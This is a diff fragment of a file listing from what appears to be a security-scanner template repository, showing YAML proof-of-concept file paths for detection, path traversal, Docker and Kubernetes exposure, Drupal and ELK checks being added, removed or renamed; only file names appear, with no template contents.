./poc/detect/ppdetect.yaml -./poc/detect/prestashop-detect.yaml +./poc/detect/prestashop-detect-9651.yaml ./poc/detect/privatebin-detect.yaml ./poc/detect/proftpd-server-detect.yaml ./poc/detect/programming-language-detect.yaml @@ -44767,16 +44748,14 @@ ./poc/detect/prtg-detect-9703.yaml ./poc/detect/prtg-detect-9704.yaml ./poc/detect/prtg-detect-9705.yaml -./poc/detect/prtg-detect-9706.yaml ./poc/detect/prtg-detect.yaml ./poc/detect/prtg-version-detect.yaml ./poc/detect/pulse-secure-version-detect.yaml -./poc/detect/puppet-node-manager-detect-9720.yaml +./poc/detect/puppet-node-manager-detect.yaml ./poc/detect/puppetdb-detect-9717.yaml ./poc/detect/puppetdb-detect-9718.yaml ./poc/detect/puppetdb-detect-9719.yaml ./poc/detect/puppetserver-detect-9721.yaml -./poc/detect/puppetserver-detect-9722.yaml ./poc/detect/puppetserver-detect-9723.yaml ./poc/detect/qnap_nas_detect.yaml ./poc/detect/quantum-scalar-detect.yaml @@ -44797,6 +44776,7 @@ ./poc/detect/redis-honeypot-detection.yaml ./poc/detect/redmine-cli-detect-9852.yaml ./poc/detect/redmine-cli-detect-9853.yaml +./poc/detect/redmine-cli-detect-9854.yaml ./poc/detect/redmine-cli-detect-9855.yaml ./poc/detect/redmine-cli-detect-9856.yaml ./poc/detect/redmine-cli-detect.yaml @@ -44811,14 +44791,15 @@ ./poc/detect/reverse-proxy-detect.yaml ./poc/detect/rhymix-cms-detect-9876.yaml ./poc/detect/rhymix-cms-detect-9877.yaml +./poc/detect/rhymix-cms-detect-9878.yaml ./poc/detect/rhymix-cms-detect-9879.yaml ./poc/detect/riak-detect.yaml ./poc/detect/room-alert-detect.yaml ./poc/detect/routeros-version-detect.yaml ./poc/detect/rpcbind-portmapper-detect.yaml -./poc/detect/rseenet-detect-9916.yaml -./poc/detect/rstudio-detect-9917.yaml +./poc/detect/rseenet-detect.yaml ./poc/detect/rstudio-detect-9918.yaml +./poc/detect/rstudio-detect-9919.yaml ./poc/detect/rstudio-detect.yaml ./poc/detect/rsyncd-service-detect.yaml ./poc/detect/rtsp-detect.yaml @@ -44847,37 +44828,35 @@ ./poc/detect/sap-netweaver-detect-10043.yaml ./poc/detect/sap-netweaver-detect-10044.yaml ./poc/detect/sap-netweaver-detect-10046.yaml -./poc/detect/sap-netweaver-detect-10047.yaml ./poc/detect/sap-netweaver-detect-10048.yaml ./poc/detect/sap-netweaver-detect.yaml ./poc/detect/sap-recon-detect-10062.yaml -./poc/detect/sap-recon-detect-10063.yaml ./poc/detect/sap-recon-detect.yaml ./poc/detect/sap-successfactors-detect.yaml ./poc/detect/saprouter-detect.yaml ./poc/detect/sceditor-detect-10092.yaml +./poc/detect/sceditor-detect-10093.yaml ./poc/detect/sceditor-detect-10094.yaml ./poc/detect/schneider-electric-detect.yaml +./poc/detect/secmail-detect-10109.yaml ./poc/detect/secmail-detect-10110.yaml ./poc/detect/secmail-detect-10111.yaml -./poc/detect/secmail-detect-10112.yaml ./poc/detect/secmail-detect.yaml ./poc/detect/securityspy-detect-10119.yaml ./poc/detect/securityspy-detect-10120.yaml ./poc/detect/securityspy-detect.yaml ./poc/detect/seeddms-detect-10129.yaml ./poc/detect/seeddms-detect-10130.yaml +./poc/detect/seeddms-detect-10131.yaml ./poc/detect/seeddms-detect.yaml ./poc/detect/server-backup-manager-se-login-detect.yaml ./poc/detect/shiro-deserialization-detection.yaml ./poc/detect/shiro-detect-10195.yaml -./poc/detect/shiro-detect-10196.yaml ./poc/detect/shiro-detect-10197.yaml ./poc/detect/shopizer-detect-1.yaml ./poc/detect/shopizer-detect-2.yaml ./poc/detect/shopware-detect-1.yaml ./poc/detect/shopware-detect-10210.yaml -./poc/detect/shopware-detect-10211.yaml ./poc/detect/shopware-detect-10212.yaml ./poc/detect/shopware-detect-10213.yaml ./poc/detect/shopware-detect-2.yaml @@ -44887,7 +44866,6 @@ ./poc/detect/smartstore-detect-10332.yaml ./poc/detect/smartstore-detect-10333.yaml ./poc/detect/smartstore-detect-10334.yaml -./poc/detect/smartstore-detect.yaml ./poc/detect/smb-detect.yaml ./poc/detect/smb-os-detect.yaml ./poc/detect/smb-v1-detect.yaml @@ -44907,7 +44885,7 @@ ./poc/detect/solarwinds-whd-version-detect.yaml ./poc/detect/somansa-dlp-detect.yaml ./poc/detect/sonicwall-email-security-detect-10383.yaml -./poc/detect/sonicwall-email-security-detect.yaml +./poc/detect/sonicwall-email-security-detect-10384.yaml ./poc/detect/sonicwall-secure-mobile-access-version-detect.yaml ./poc/detect/sophos-fw-version-detect-1.yaml ./poc/detect/sophos-fw-version-detect-10396.yaml @@ -44936,9 +44914,9 @@ ./poc/detect/supermicro-ipmi-ui-detect.yaml ./poc/detect/supermicro-logo-detect.yaml ./poc/detect/symfony-detect.yaml -./poc/detect/tableau-server-detect.yaml +./poc/detect/tableau-server-detect-10643.yaml ./poc/detect/teamspeak3-detect.yaml -./poc/detect/tech-detect-10673.yaml +./poc/detect/tech-detect-10672.yaml ./poc/detect/tech-detect-10674.yaml ./poc/detect/tech-detect-10675.yaml ./poc/detect/tech-detect-10676.yaml @@ -44950,7 +44928,7 @@ ./poc/detect/telerik-dialoghandler-detect-10.yaml ./poc/detect/telerik-dialoghandler-detect-10687.yaml ./poc/detect/telerik-dialoghandler-detect-10688.yaml -./poc/detect/telerik-dialoghandler-detect-10690.yaml +./poc/detect/telerik-dialoghandler-detect-10691.yaml ./poc/detect/telerik-dialoghandler-detect-11.yaml ./poc/detect/telerik-dialoghandler-detect-12.yaml ./poc/detect/telerik-dialoghandler-detect-13.yaml @@ -44983,9 +44961,11 @@ ./poc/detect/tftp-detect.yaml ./poc/detect/thinkcmf-detection-10717.yaml ./poc/detect/thinkcmf-detection-10718.yaml +./poc/detect/thinkcmf-detection-10719.yaml ./poc/detect/thinkcmf-detection.yaml ./poc/detect/thinkphp-debug-detected.yaml ./poc/detect/thruk-detect.yaml +./poc/detect/tibco-spotfire-services-detect.yaml ./poc/detect/tingsboard-detect.yaml ./poc/detect/tomcat-detect-10792.yaml ./poc/detect/tomcat-detect-10793.yaml @@ -45004,7 +44984,7 @@ ./poc/detect/tyan-logo-detect.yaml ./poc/detect/tyan-rmm-ui-detect.yaml ./poc/detect/unauthorized-brother-access-detect.yaml -./poc/detect/unauthorized-puppet-node-manager-detect-10959.yaml +./poc/detect/unauthorized-puppet-node-manager-detect-10958.yaml ./poc/detect/unauthorized-puppet-node-manager-detect.yaml ./poc/detect/urls-detection.yaml ./poc/detect/vercel-detect.yaml @@ -45014,7 +44994,7 @@ ./poc/detect/versa-flexvnf-server-detect.yaml ./poc/detect/versa-flexvnf-ui-detect.yaml ./poc/detect/virtual-ema-detect-1.yaml -./poc/detect/virtual-ema-detect-11024.yaml +./poc/detect/virtual-ema-detect-11025.yaml ./poc/detect/virtual-ema-detect-2.yaml ./poc/detect/virtual-ema-detect.yaml ./poc/detect/vmware-airwatch-version-detect.yaml @@ -45023,17 +45003,17 @@ ./poc/detect/vmware-version-detect-11055.yaml ./poc/detect/vmware-version-detect.yaml ./poc/detect/vmware-vrealize-detect-11056.yaml -./poc/detect/vmware-vrealize-detect-11057.yaml ./poc/detect/vmware-vrealize-detect-11058.yaml +./poc/detect/vmware-vrealize-detect.yaml ./poc/detect/vnc-detect-11061.yaml ./poc/detect/vnc-detect.yaml ./poc/detect/vnc-service-detect.yaml ./poc/detect/voipmonitor-detect.yaml -./poc/detect/vsftpd-detection-11073.yaml ./poc/detect/vsftpd-detection-11074.yaml +./poc/detect/vsftpd-detection-11075.yaml ./poc/detect/vsftpd-detection-11076.yaml ./poc/detect/vsftpd-detection.yaml -./poc/detect/waf-detect-11086.yaml +./poc/detect/waf-detect-11087.yaml ./poc/detect/waf-detect-11088.yaml ./poc/detect/waf-detect-11089.yaml ./poc/detect/waf-detect-11090.yaml @@ -45045,6 +45025,7 @@ ./poc/detect/wamp-xdebug-detect-11101.yaml ./poc/detect/wamp-xdebug-detect-11102.yaml ./poc/detect/wamp-xdebug-detect-11103.yaml +./poc/detect/wamp-xdebug-detect-11104.yaml ./poc/detect/wamp-xdebug-detect.yaml ./poc/detect/wazuh-detect-11110.yaml ./poc/detect/wazuh-detect.yaml @@ -45053,11 +45034,10 @@ ./poc/detect/weave-scope-dashboard-detect.yaml ./poc/detect/web-framework-detect.yaml ./poc/detect/web-ftp-detect-11135.yaml -./poc/detect/web-ftp-detect-11136.yaml ./poc/detect/web-ftp-detect-11137.yaml ./poc/detect/web-ftp-detect-11138.yaml ./poc/detect/web-suite-detect-11167.yaml -./poc/detect/web-suite-detect.yaml +./poc/detect/web-suite-detect-11168.yaml ./poc/detect/webeditors-check-detect.yaml ./poc/detect/weblogic-bea_wls_internal-detect.yaml ./poc/detect/weblogic-detect-11142.yaml @@ -45069,7 +45049,7 @@ ./poc/detect/weblogic-iiop-detect-11148.yaml ./poc/detect/weblogic-iiop-detect.yaml ./poc/detect/weblogic-t3-detect-11151.yaml -./poc/detect/weblogic-t3-detect-11152.yaml +./poc/detect/weblogic-t3-detect-11153.yaml ./poc/detect/weblogic-t3-detect.yaml ./poc/detect/websphere-version-detect.yaml ./poc/detect/werkzeug-debugger-detect-11195.yaml @@ -45085,12 +45065,11 @@ ./poc/detect/widget-detector-elementor.yaml ./poc/detect/wing-ftp-detect.yaml ./poc/detect/wondercms-detect-11221.yaml +./poc/detect/wondercms-detect-11222.yaml ./poc/detect/wondercms-detect-11223.yaml -./poc/detect/wondercms-detect.yaml -./poc/detect/wordpress-detect-11261.yaml +./poc/detect/wordpress-detect-11260.yaml ./poc/detect/wordpress-detect.yaml ./poc/detect/wordpress-detect2.yaml -./poc/detect/wordpress-gotmls-detect-11280.yaml ./poc/detect/wordpress-gotmls-detect-11281.yaml ./poc/detect/wordpress-gotmls-detect.yaml ./poc/detect/wordpress-plugins-detect-11296.yaml @@ -45102,11 +45081,9 @@ ./poc/detect/wordpress-themes-detect.yaml ./poc/detect/wordpress-website-detect.yaml ./poc/detect/worksites-detection-11383.yaml -./poc/detect/worksites-detection-11384.yaml ./poc/detect/worksites-detection-11385.yaml ./poc/detect/worksites-detection-11386.yaml ./poc/detect/workspaceone-uem-airwatch-dashboard-detect.yaml -./poc/detect/wowza-streaming-detect.yaml ./poc/detect/wp-admin-detect.yaml ./poc/detect/wp-detect.yaml ./poc/detect/wp-mobile-detector-291130449baacf0e6d1046f164f908e9.yaml @@ -45126,12 +45103,13 @@ ./poc/detect/ws_ftp-ssh-detect.yaml ./poc/detect/wsdl-detect.yaml ./poc/detect/wso2-apimanager-detect-11637.yaml -./poc/detect/wso2-apimanager-detect-11638.yaml ./poc/detect/wso2-apimanager-detect-11639.yaml ./poc/detect/wso2-apimanager-detect.yaml ./poc/detect/wuzhicms-detect-11652.yaml ./poc/detect/wuzhicms-detect-11653.yaml +./poc/detect/wuzhicms-detect-11654.yaml ./poc/detect/wuzhicms-detect-11655.yaml +./poc/detect/wuzhicms-detect.yaml ./poc/detect/xlight-ftp-service-detect.yaml ./poc/detect/xml-schema-detect-11692.yaml ./poc/detect/xml-schema-detect.yaml @@ -45142,13 +45120,14 @@ ./poc/detect/yapi-detect-11722.yaml ./poc/detect/yellowfin-bi-version-detect.yaml ./poc/detect/yongyou-nc-beanshell-detect.yaml +./poc/detect/yourls-detect.yaml ./poc/detect/yzmcms-detect-11751.yaml ./poc/detect/yzmcms-detect-11752.yaml ./poc/detect/yzmcms-detect.yaml ./poc/detect/zabbix-version-detect.yaml ./poc/detect/zebra-printer-detect.yaml +./poc/detect/zentao-detect-11785.yaml ./poc/detect/zentao-detect-11786.yaml -./poc/detect/zentao-detect-11787.yaml ./poc/detect/zentao-detect.yaml ./poc/detect/zentral-detection.yaml ./poc/detect/zentral-detection.yml @@ -45185,11 +45164,10 @@ ./poc/directory_listing/ecology-filedownload-directory-traversal.yml ./poc/directory_listing/ecology-jqueryfiletree-directory-traversal.yaml ./poc/directory_listing/ecology-springframework-directory-traversal-7174.yaml -./poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml +./poc/directory_listing/ecology-springframework-directory-traversal.yaml ./poc/directory_listing/ecology-springframework-directory-traversal.yml ./poc/directory_listing/ecology-springframework-directoryTraversal.yaml -./poc/directory_listing/elFinder-path-traversal.yaml -./poc/directory_listing/elfinder-path-traversal-7203.yaml +./poc/directory_listing/elfinder-path-traversal.yaml ./poc/directory_listing/erp-nc-directory-traversal-7245.yaml ./poc/directory_listing/erp-nc-directory-traversal-7246.yaml ./poc/directory_listing/erp-nc-directory-traversal-7247.yaml @@ -45218,12 +45196,11 @@ ./poc/directory_listing/kingdee-eas-DirectoryTraversal.yaml ./poc/directory_listing/kingdee-eas-directory-traversal-8488.yaml ./poc/directory_listing/kingdee-eas-directory-traversal-8489.yaml -./poc/directory_listing/kingdee-eas-directory-traversal.yaml ./poc/directory_listing/kingdee-eas-directory-traversal.yml ./poc/directory_listing/natshell-path-traversal-9005.yaml +./poc/directory_listing/natshell-path-traversal-9006.yaml ./poc/directory_listing/natshell-path-traversal-9007.yaml ./poc/directory_listing/natshell-path-traversal-9008.yaml -./poc/directory_listing/natshell-path-traversal.yaml ./poc/directory_listing/netmizer-log-management-data-directory-traversal.yaml ./poc/directory_listing/nexusdb-cve-2020-24571-path-traversal.yml ./poc/directory_listing/nginx-merge-slashes-path-traversal-1.yaml @@ -45236,8 +45213,6 @@ ./poc/directory_listing/oa-tongda-path-traversal-9175.yaml ./poc/directory_listing/oa-tongda-path-traversal-9176.yaml ./poc/directory_listing/oa-tongda-path-traversal-9177.yaml -./poc/directory_listing/oa-tongda-path-traversal-9178.yaml -./poc/directory_listing/oa-tongda-path-traversal-9179.yaml ./poc/directory_listing/oa-tongda-path-traversal.yaml ./poc/directory_listing/path-traversal-exposure.yaml ./poc/directory_listing/path-traversal.yaml @@ -45248,16 +45223,17 @@ ./poc/directory_listing/pmb-directory-traversal-9612.yaml ./poc/directory_listing/pmb-directory-traversal-9613.yaml ./poc/directory_listing/pmb-directory-traversal-9614.yaml +./poc/directory_listing/pmb-directory-traversal.yaml +./poc/directory_listing/tpshop-directory-traversal-10821.yaml ./poc/directory_listing/tpshop-directory-traversal-10822.yaml -./poc/directory_listing/tpshop-directory-traversal-10823.yaml +./poc/directory_listing/tpshop-directory-traversal.yaml ./poc/directory_listing/tpshop-directory-traversal.yml ./poc/directory_listing/weiphp-path-traversal.yaml ./poc/directory_listing/weiphp-path-traversal.yml ./poc/directory_listing/wooyun-path-traversal-11229.yaml +./poc/directory_listing/wooyun-path-traversal-11230.yaml ./poc/directory_listing/wooyun-path-traversal-11231.yaml -./poc/directory_listing/wooyun-path-traversal-11232.yaml ./poc/directory_listing/wooyun-path-traversal-11233.yaml -./poc/directory_listing/wooyun-path-traversal.yaml ./poc/directory_listing/wordpress-duplicator-path-traversal.yaml ./poc/directory_listing/wp-duplicator-path-traversal.yaml ./poc/directory_listing/yongyou-fe-templateoftaohong-manager-path-traversal.yaml @@ -45266,12 +45242,10 @@ ./poc/directory_listing/zeit-nodejs-cve-2020-5284-directory-traversal.yml ./poc/docker/Kubernetes-unauth.yaml ./poc/docker/amazon-docker-config-279.yaml -./poc/docker/amazon-docker-config-280.yaml -./poc/docker/amazon-docker-config-disclosure-278.yaml ./poc/docker/amazon-docker-config-disclosure.yaml +./poc/docker/amazon-docker-config.yaml ./poc/docker/aws-ecs-container-agent-tasks-639.yaml ./poc/docker/aws-ecs-container-agent-tasks-640.yaml -./poc/docker/aws-ecs-container-agent-tasks-641.yaml ./poc/docker/aws-ecs-container-agent-tasks.yaml ./poc/docker/container-registry-exposure.yaml ./poc/docker/docker-api-detection.yaml @@ -45288,7 +45262,7 @@ ./poc/docker/docker-compose-config-7.yaml ./poc/docker/docker-compose-config-7057.yaml ./poc/docker/docker-compose-config-7058.yaml -./poc/docker/docker-compose-config-7059.yaml +./poc/docker/docker-compose-config.yaml ./poc/docker/docker-compose-config.yml ./poc/docker/docker-compose.debug.yml ./poc/docker/docker-compose.yaml @@ -45301,7 +45275,6 @@ ./poc/docker/docker-registry-7065.yaml ./poc/docker/docker-registry-7066.yaml ./poc/docker/docker-registry-7067.yaml -./poc/docker/docker-registry-7068.yaml ./poc/docker/docker-registry-api-unauth.yaml ./poc/docker/docker-registry-api-unauth.yml ./poc/docker/docker-registry.yaml @@ -45310,13 +45283,12 @@ ./poc/docker/dockercfg-config-1.yaml ./poc/docker/dockercfg-config-2.yaml ./poc/docker/dockercfg-config-7056.yaml -./poc/docker/dockercfg-config.yaml ./poc/docker/dockercfg.yaml ./poc/docker/dockerfile-disclosure.yaml ./poc/docker/dockerfile-hidden-disclosure-1.yaml ./poc/docker/dockerfile-hidden-disclosure-2.yaml +./poc/docker/dockerfile-hidden-disclosure-7061.yaml ./poc/docker/dockerfile-hidden-disclosure-7062.yaml -./poc/docker/dockerfile-hidden-disclosure-7063.yaml ./poc/docker/dockerfile-hidden-disclosure.yaml ./poc/docker/dockerrun-aws-config-page.yaml ./poc/docker/dynamic-container-host.yaml @@ -45330,18 +45302,16 @@ ./poc/docker/kubernetes-dashboard-8526.yaml ./poc/docker/kubernetes-dashboard.yaml ./poc/docker/kubernetes-enterprise-manager-8527.yaml -./poc/docker/kubernetes-enterprise-manager-8529.yaml +./poc/docker/kubernetes-enterprise-manager-8528.yaml ./poc/docker/kubernetes-enterprise-manager-8530.yaml ./poc/docker/kubernetes-enterprise-manager.yaml ./poc/docker/kubernetes-etcd-keys.yaml ./poc/docker/kubernetes-fake-certificate.yaml ./poc/docker/kubernetes-kustomization-disclosure-8531.yaml ./poc/docker/kubernetes-kustomization-disclosure-8532.yaml -./poc/docker/kubernetes-kustomization-disclosure.yaml ./poc/docker/kubernetes-metrics-8534.yaml ./poc/docker/kubernetes-metrics-8535.yaml ./poc/docker/kubernetes-metrics-8536.yaml -./poc/docker/kubernetes-metrics.yaml ./poc/docker/kubernetes-mirantis-8537.yaml ./poc/docker/kubernetes-mirantis-8538.yaml ./poc/docker/kubernetes-mirantis-8539.yaml @@ -45349,23 +45319,23 @@ ./poc/docker/kubernetes-mirantis.yaml ./poc/docker/kubernetes-pods-1.yaml ./poc/docker/kubernetes-pods-2.yaml -./poc/docker/kubernetes-pods-8543.yaml +./poc/docker/kubernetes-pods-8542.yaml ./poc/docker/kubernetes-pods-8544.yaml ./poc/docker/kubernetes-pods-8546.yaml ./poc/docker/kubernetes-pods-api.yaml ./poc/docker/kubernetes-pods.yaml ./poc/docker/kubernetes-resource-report-8547.yaml ./poc/docker/kubernetes-resource-report-8548.yaml -./poc/docker/kubernetes-unauth.yaml +./poc/docker/kubernetes-unauth(1).yaml ./poc/docker/kubernetes-unauth.yml ./poc/docker/kubernetes-version-8550.yaml ./poc/docker/kubernetes-version-8551.yaml +./poc/docker/kubernetes-version-8552.yaml ./poc/docker/kubernetes-version-8553.yaml -./poc/docker/kubernetes-version.yaml ./poc/docker/kubernetes-web-view.yaml ./poc/docker/kubernetes.yaml +./poc/docker/misconfigured-docker-8900.yaml ./poc/docker/misconfigured-docker-8901.yaml -./poc/docker/misconfigured-docker-8902.yaml ./poc/docker/misconfigured-docker.yaml ./poc/docker/oracle-containers-panel.yaml ./poc/drupal/drupal-7-elfinder.yaml @@ -45373,7 +45343,6 @@ ./poc/drupal/drupal-cve-2018-7600-rce.yml ./poc/drupal/drupal-cve-2019-6340.yml ./poc/drupal/drupal-full-path-disclosure.yaml -./poc/drupal/drupal-install-7105.yaml ./poc/drupal/drupal-install-7106.yaml ./poc/drupal/drupal-install-7108.yaml ./poc/drupal/drupal-install.yaml @@ -45385,7 +45354,6 @@ ./poc/drupal/drupal-user-enum-ajax-3.yaml ./poc/drupal/drupal-user-enum-ajax-4.yaml ./poc/drupal/drupal-user-enum-ajax-7109.yaml -./poc/drupal/drupal-user-enum-ajax-7111.yaml ./poc/drupal/drupal-user-enum-ajax.yaml ./poc/drupal/drupal-user-enum-redirect-1.yaml ./poc/drupal/drupal-user-enum-redirect-2.yaml @@ -45759,6 +45727,7 @@ ./poc/elk/elasticsearch-insecure-default-config.yaml ./poc/elk/elasticsearch-log4j.yaml ./poc/elk/elasticsearch-sql-client-detect-7189.yaml +./poc/elk/elasticsearch-sql-client-detect-7190.yaml ./poc/elk/elasticsearch-sql-client-detect-7191.yaml ./poc/elk/elasticsearch-sql-client-detect-7192.yaml ./poc/elk/elasticsearch-unauth.yaml @@ -45776,9 +45745,9 @@ ./poc/elk/kibana-detect-1.yaml ./poc/elk/kibana-detect-2.yaml ./poc/elk/kibana-detect-3.yaml -./poc/elk/kibana-detect-8484.yaml +./poc/elk/kibana-detect-8483.yaml ./poc/elk/kibana-detect.yaml -./poc/elk/kibana-panel-8486.yaml +./poc/elk/kibana-panel-8485.yaml ./poc/elk/kibana-panel-8487.yaml ./poc/elk/kibana-panel.yaml ./poc/elk/kibana-unauth.yaml @@ -45821,20 +45790,18 @@ ./poc/exposed/active-admin-exposure-39.yaml ./poc/exposed/active-admin-exposure-40.yaml ./poc/exposed/active-admin-exposure-41.yaml -./poc/exposed/active-admin-exposure-42.yaml +./poc/exposed/active-admin-exposure-43.yaml ./poc/exposed/active-admin-exposure.yaml ./poc/exposed/activemq-path-disclosure.yaml -./poc/exposed/adobe-connect-username-exposure-100.yaml ./poc/exposed/adobe-connect-username-exposure-101.yaml ./poc/exposed/adobe-connect-username-exposure-98.yaml ./poc/exposed/adobe-connect-username-exposure-99.yaml ./poc/exposed/adobe-connect-username-exposure.yaml ./poc/exposed/airflow-api-exposure.yaml ./poc/exposed/airflow-configuration-exposure-229.yaml -./poc/exposed/airflow-configuration-exposure.yaml +./poc/exposed/airflow-configuration-exposure-230.yaml ./poc/exposed/airflow-exposure.yaml ./poc/exposed/allied-telesis-exposure.yaml -./poc/exposed/amazon-docker-config-disclosure-278.yaml ./poc/exposed/amazon-docker-config-disclosure.yaml ./poc/exposed/amazon-sns-topic-disclosure-detect.yaml ./poc/exposed/ambari-exposure-291.yaml @@ -45845,11 +45812,11 @@ ./poc/exposed/ampache-update-exposure.yaml ./poc/exposed/android-debug-database-exposed-312.yaml ./poc/exposed/android-debug-database-exposed-313.yaml +./poc/exposed/android-debug-database-exposed-314.yaml ./poc/exposed/android-debug-database-exposed-315.yaml -./poc/exposed/android-debug-database-exposed-316.yaml ./poc/exposed/android-debug-database-exposed.yaml ./poc/exposed/ansible-config-disclosure-325.yaml -./poc/exposed/ansible-config-disclosure.yaml +./poc/exposed/ansible-config-disclosure-326.yaml ./poc/exposed/ansible-tower-exposure-329.yaml ./poc/exposed/ansible-tower-exposure-330.yaml ./poc/exposed/ansible-tower-exposure-332.yaml @@ -45868,6 +45835,7 @@ ./poc/exposed/appspec-yml-disclosure-2.yaml ./poc/exposed/appspec-yml-disclosure-527.yaml ./poc/exposed/appspec-yml-disclosure-528.yaml +./poc/exposed/appspec-yml-disclosure-529.yaml ./poc/exposed/aspnetmvc-version-disclosure.yaml ./poc/exposed/atlassian-jira-info-disclosure.yaml ./poc/exposed/atom-sync-exposure.yaml @@ -45878,8 +45846,8 @@ ./poc/exposed/avtech-password-disclosure.yaml ./poc/exposed/axiom-digitalocean-key-exposure-665.yaml ./poc/exposed/axiom-digitalocean-key-exposure-666.yaml -./poc/exposed/axiom-digitalocean-key-exposure-667.yaml ./poc/exposed/axiom-digitalocean-key-exposure-668.yaml +./poc/exposed/axiom-digitalocean-key-exposure.yaml ./poc/exposed/azure-apim-secret-key-disclosure.yaml ./poc/exposed/azure-pipelines-config-disclosure.yaml ./poc/exposed/azure-pipelines-exposed.yaml @@ -45887,6 +45855,7 @@ ./poc/exposed/bash-history-exposure.yaml ./poc/exposed/beward-ipcamera-disclosure-713.yaml ./poc/exposed/beward-ipcamera-disclosure-714.yaml +./poc/exposed/beward-ipcamera-disclosure-715.yaml ./poc/exposed/beward-ipcamera-disclosure-716.yaml ./poc/exposed/beward-ipcamera-disclosure-717.yaml ./poc/exposed/bitly-secret-key-disclosure.yaml @@ -45895,20 +45864,22 @@ ./poc/exposed/casbin-get-users-account-password-disclosure.yaml ./poc/exposed/caucho-resin-info-disclosure-1.yaml ./poc/exposed/caucho-resin-info-disclosure-2.yaml +./poc/exposed/caucho-resin-info-disclosure-871.yaml ./poc/exposed/caucho-resin-info-disclosure-872.yaml -./poc/exposed/caucho-resin-info-disclosure.yaml +./poc/exposed/cisco-meraki-exposure-944.yaml ./poc/exposed/cisco-meraki-exposure-945.yaml -./poc/exposed/cisco-meraki-exposure-946.yaml ./poc/exposed/cisco-meraki-exposure.yaml ./poc/exposed/cisco-smi-exposure-970.yaml -./poc/exposed/cisco-smi-exposure-972.yaml +./poc/exposed/cisco-smi-exposure-971.yaml ./poc/exposed/cisco-smi-exposure.yaml ./poc/exposed/clockwork-dashboard-exposure-1012.yaml ./poc/exposed/clockwork-dashboard-exposure-1013.yaml +./poc/exposed/clockwork-dashboard-exposure-1015.yaml ./poc/exposed/clockwork-dashboard-exposure.yaml ./poc/exposed/cobbler-exposed-directories.yaml ./poc/exposed/commax-credentials-disclosure-1158.yaml ./poc/exposed/commax-credentials-disclosure-1159.yaml +./poc/exposed/commax-credentials-disclosure-1160.yaml ./poc/exposed/comtrend-password-exposure-1166.yaml ./poc/exposed/comtrend-password-exposure-1167.yaml ./poc/exposed/container-registry-exposure.yaml @@ -45917,7 +45888,7 @@ ./poc/exposed/coremail-config-disclosure-1214.yaml ./poc/exposed/coremail-config-disclosure-1216.yaml ./poc/exposed/coremail-config-disclosure.yaml -./poc/exposed/couchdb-exposure-1238.yaml +./poc/exposed/couchdb-exposure-1239.yaml ./poc/exposed/couchdb-exposure-1240.yaml ./poc/exposed/couchdb-exposure-1241.yaml ./poc/exposed/couchdb-exposure.yaml @@ -45929,11 +45900,13 @@ ./poc/exposed/credentials-disclosure-1253.yaml ./poc/exposed/credentials-disclosure-1254.yaml ./poc/exposed/credentials-disclosure-1255.yaml +./poc/exposed/credentials-disclosure-1256.yaml ./poc/exposed/credentials-disclosure-all.yaml ./poc/exposed/dahua-passowrd-disclosure.yaml ./poc/exposed/dashboard-exposed.yaml ./poc/exposed/database.json-exposure.yaml ./poc/exposed/dede-cms-radminpass-disclosure.yaml +./poc/exposed/django-debug-exposed-404.yaml ./poc/exposed/django-debug-exposure-7028.yaml ./poc/exposed/django-debug-exposure-7029.yaml ./poc/exposed/django-debug-exposure-7030.yaml @@ -45945,11 +45918,10 @@ ./poc/exposed/dockerfile-disclosure.yaml ./poc/exposed/dockerfile-hidden-disclosure-1.yaml ./poc/exposed/dockerfile-hidden-disclosure-2.yaml +./poc/exposed/dockerfile-hidden-disclosure-7061.yaml ./poc/exposed/dockerfile-hidden-disclosure-7062.yaml -./poc/exposed/dockerfile-hidden-disclosure-7063.yaml ./poc/exposed/dockerfile-hidden-disclosure.yaml ./poc/exposed/doorgets-info-disclosure.yaml -./poc/exposed/druid-console-exposure-7092.yaml ./poc/exposed/druid-console-exposure-7093.yaml ./poc/exposed/druid-console-exposure-7094.yaml ./poc/exposed/druid-console-exposure.yaml @@ -45990,10 +45962,12 @@ ./poc/exposed/exposed security questions.yaml ./poc/exposed/exposed-adb-7280.yaml ./poc/exposed/exposed-adb-7281.yaml +./poc/exposed/exposed-adb-7282.yaml ./poc/exposed/exposed-adb.yaml ./poc/exposed/exposed-alps-spring-1.yaml ./poc/exposed/exposed-alps-spring-2.yaml ./poc/exposed/exposed-alps-spring-3.yaml +./poc/exposed/exposed-alps-spring-7283.yaml ./poc/exposed/exposed-alps-spring-7284.yaml ./poc/exposed/exposed-alps-spring-7285.yaml ./poc/exposed/exposed-alps-spring.yaml @@ -46005,17 +45979,19 @@ ./poc/exposed/exposed-authentication.asmx.yaml ./poc/exposed/exposed-backup-files.yaml ./poc/exposed/exposed-bitkeeper-7290.yaml +./poc/exposed/exposed-bitkeeper-7292.yaml ./poc/exposed/exposed-bitkeeper.yaml ./poc/exposed/exposed-bzr-7293.yaml ./poc/exposed/exposed-bzr-7295.yaml ./poc/exposed/exposed-bzr.yaml ./poc/exposed/exposed-darcs-7296.yaml -./poc/exposed/exposed-darcs-7298.yaml +./poc/exposed/exposed-darcs-7297.yaml ./poc/exposed/exposed-darcs.yaml ./poc/exposed/exposed-docker-api-1.yaml ./poc/exposed/exposed-docker-api-2.yaml ./poc/exposed/exposed-docker-api-7299.yaml ./poc/exposed/exposed-docker-api-7300.yaml +./poc/exposed/exposed-docker-api-7301.yaml ./poc/exposed/exposed-dockerd.yaml ./poc/exposed/exposed-elasticsearch.yaml ./poc/exposed/exposed-env-js.yaml @@ -46028,7 +46004,6 @@ ./poc/exposed/exposed-gitignore-2.yaml ./poc/exposed/exposed-gitignore-3.yaml ./poc/exposed/exposed-gitignore-7302.yaml -./poc/exposed/exposed-gitignore-7303.yaml ./poc/exposed/exposed-gitignore-7304.yaml ./poc/exposed/exposed-gitignore-7306.yaml ./poc/exposed/exposed-gitlab-ci-config.yaml @@ -46040,15 +46015,16 @@ ./poc/exposed/exposed-grafana.yaml ./poc/exposed/exposed-graphql.yaml ./poc/exposed/exposed-hg-7311.yaml +./poc/exposed/exposed-hg-7312.yaml ./poc/exposed/exposed-hg.yaml ./poc/exposed/exposed-jenkins.yaml ./poc/exposed/exposed-jira.yaml ./poc/exposed/exposed-jquery-file-upload-7313.yaml ./poc/exposed/exposed-jquery-file-upload-7314.yaml ./poc/exposed/exposed-jquery-file-upload-7315.yaml -./poc/exposed/exposed-jquery-file-upload.yaml ./poc/exposed/exposed-kafdrop-7316.yaml ./poc/exposed/exposed-kafdrop-7317.yaml +./poc/exposed/exposed-kafdrop-7318.yaml ./poc/exposed/exposed-kafdrop.yaml ./poc/exposed/exposed-kibana-1.yaml 